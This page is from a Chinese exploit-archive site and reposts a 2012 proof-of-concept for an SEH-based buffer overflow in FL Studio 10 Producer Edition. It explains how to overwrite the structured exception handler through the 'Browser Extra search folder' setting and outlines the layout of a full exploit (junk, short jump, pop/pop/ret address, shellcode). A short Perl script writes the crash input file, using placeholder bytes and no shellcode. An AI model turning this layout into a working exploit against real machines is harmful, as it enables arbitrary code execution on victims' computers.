首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FL Studio 10 Producer Edition SEH Based Buffer Overflow PoC
来源:vfocus.net 作者:Dark-Puzzle 发布时间:2012-10-10  

# Title  : FL Studio 10 Producer Edition - SEH Based Buffer Overflow PoC
# Author : Dark-Puzzle (Souhail Hammou)
# Type   : PoC
# Risk   : High
# Vendor : Image Line: http://www.image-line.com/downloads/flstudiodownload.html
# Versions : 10 Producer Edition (Other Versions May be Vulnerable).
# Tested On : Windows 7 64-bits .
# Date : 8 October 2012
-----------------------------------------
-----------------------------------------
# Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...
# Fl Studio is Prone to a SEH based Buffer Overflow which allows attacker to execute arbitary code on the victim's machine .
# To trigger the vulnerability the attacker must fake the "Browser Extra search folder" path & paste the input released from this PoC .
# Looking a little bit deeper in the stack & in the EBP register we will see that the software will try to create a file named e.g. BBBBCCCC.NFO
# Then the EIP is overwritten with the SEH address .
# The Exploit will look like this : [Junk "A" x 416] [6 Bytes Jump + 2Nops ] [p/p/r address or other] [Shellcode] .
# Go to Options ---> File Settings ---> Choose File In the left column ---> Paste the input in Browser Extra Search Folder ---> Press Enter ---> and close the window .
# == Crash Triggered + Seh Overwritten .

#Images :
#1st : http://s7.postimage.org/ubgogmjmz/image.png
#2nd : http://s7.postimage.org/yymqie6zv/image.png
#3rd : http://s7.postimage.org/3p47rnffv/image.png

my $As = "\x41" x 416 ;
my $pnseh = "\x42\x42\x42\x42";
my $seh = "\x43\x43\x43\x43";

my $input = $As.$pnseh.$seh;


open(myfile,'>input.txt');
print myfile $input;
close(myfile);
print "FL Studio 10 Producer Edition SEH Based Overflow\n";
print "\x44\x69\x73\x63\x6F\x76\x65\x72\x65\x64\x20\x26\x20\x50\x6F\x43\x20\x42\x79\x20\x44\x61\x72\x6B\x2D\x50\x75\x7A\x7A\x6C\x65\n";
print "Creating PoC Input\n";
sleep 5;
print $input ;


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Gom Player 2.1.44.5123 (Unicod
·Arctic Torrent 1.2.3 Memory Co
·PLIB 1.8.5 ssg/ssgParser.cxx B
·Apple iOS Default SSH Password
·Avaya IP Office Customer Call
·Windows Escalate UAC Execute R
·Avaya WinPMD UniteHostRouter B
·Oracle Business Transaction Ma
·Hiro Player 1.6.0 (.mp3) Local
·HP Application Lifecycle Manag
·Microsoft IIS 5.0/6.0 FTP Serv
·MS12-063 Microsoft Internet Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved